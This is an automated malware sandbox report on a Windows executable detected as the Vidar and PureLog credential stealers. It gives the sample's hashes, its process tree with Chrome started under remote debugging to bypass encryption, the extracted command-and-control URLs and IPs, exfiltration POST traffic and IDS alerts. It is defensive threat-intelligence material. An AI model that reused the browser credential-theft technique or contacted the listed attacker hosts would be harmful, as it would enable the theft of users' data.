Edit tour

Windows Analysis Report
ZT0KQ1PC.exe

Overview

General Information

Sample name:	ZT0KQ1PC.exe
Analysis ID:	1584543
MD5:	6fe2f68f2eb2277e7f79d68d4d9b4879
SHA1:	44adb85acb84ab58b020f3114022ebb6d4516ab3
SHA256:	8bcdca66177ae9df564b790ba4311b4edf75664f152c4f9f3dd6725ffa14da23
Tags:	exeVidaruser-aachum
Infos:

Detection

PureLog Stealer, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected PureLog Stealer

Yara detected Vidar stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ZT0KQ1PC.exe (PID: 5408 cmdline: "C:\Users\user\Desktop\ZT0KQ1PC.exe" MD5: 6FE2F68F2EB2277E7F79D68D4D9B4879)

conhost.exe (PID: 3328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ZT0KQ1PC.exe (PID: 1188 cmdline: "C:\Users\user\Desktop\ZT0KQ1PC.exe" MD5: 6FE2F68F2EB2277E7F79D68D4D9B4879)

chrome.exe (PID: 7364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=2284,i,919765680095075833,18170767553792386952,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

WerFault.exe (PID: 6120 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 936 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199811540174", "Botnet": "hu76fa"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ZT0KQ1PC.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1670042528.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1803422255.0000000004129000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.ZT0KQ1PC.exe.df0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.ZT0KQ1PC.exe.4129550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.ZT0KQ1PC.exe.4129550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\ZT0KQ1PC.exe", ParentImage: C:\Users\user\Desktop\ZT0KQ1PC.exe, ParentProcessId: 1188, ParentProcessName: ZT0KQ1PC.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7364, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:08:02.251737+0100	2044247	1	Malware Command and Control Activity Detected	116.203.13.109	443	192.168.2.4	49740	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:08:03.901649+0100	2051831	1	Malware Command and Control Activity Detected	116.203.13.109	443	192.168.2.4	49742	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:08:03.901437+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49742	116.203.13.109	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:07:59.119733+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	49734	116.203.13.109	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1803422255.0000000004129000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199811540174", "Botnet": "hu76fa"}

Multi AV Scanner detection for submitted file

Source: ZT0KQ1PC.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: ZT0KQ1PC.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: 2_2_0040FBB0 CryptUnprotectData,

2_2_0040FBB0

Source: ZT0KQ1PC.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: ZT0KQ1PC.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WER9128.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WER9128.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9128.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9128.tmp.dmp.5.dr
Source:	Binary string: System.pdb) source: WER9128.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: ZT0KQ1PC.exe, WER9128.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER9128.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdbTz source: WER9128.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WER9128.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WER9128.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00410E80 FindFirstFileA,		2_2_00410E80
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0040F070 FindFirstFileA,		2_2_0040F070

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49742 -> 116.203.13.109:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49734 -> 116.203.13.109:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.13.109:443 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.13.109:443 -> 192.168.2.4:49740

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199811540174

Source: global traffic

HTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: 2_2_00408620 InternetReadFile,

2_2_00408620

Source: global traffic	HTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: quils.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chrome.exe, 00000006.00000002.2940740373.00004C1C05EB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.2940740373.00004C1C05EB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.htmlP equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000003.1798562890.00004C1C047AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1798507955.00004C1C0533C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1797914534.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000006.00000003.1798562890.00004C1C047AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1798507955.00004C1C0533C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1797914534.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.2933031959.00004C1C046D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.2935864843.00004C1C04E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.2935864843.00004C1C04E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.htmlP! equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: quils.shop
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----WT2DT2NGVAAAIEUSR1N7User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: quils.shopContent-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1967306323.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819870551.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1967306323.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819870551.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
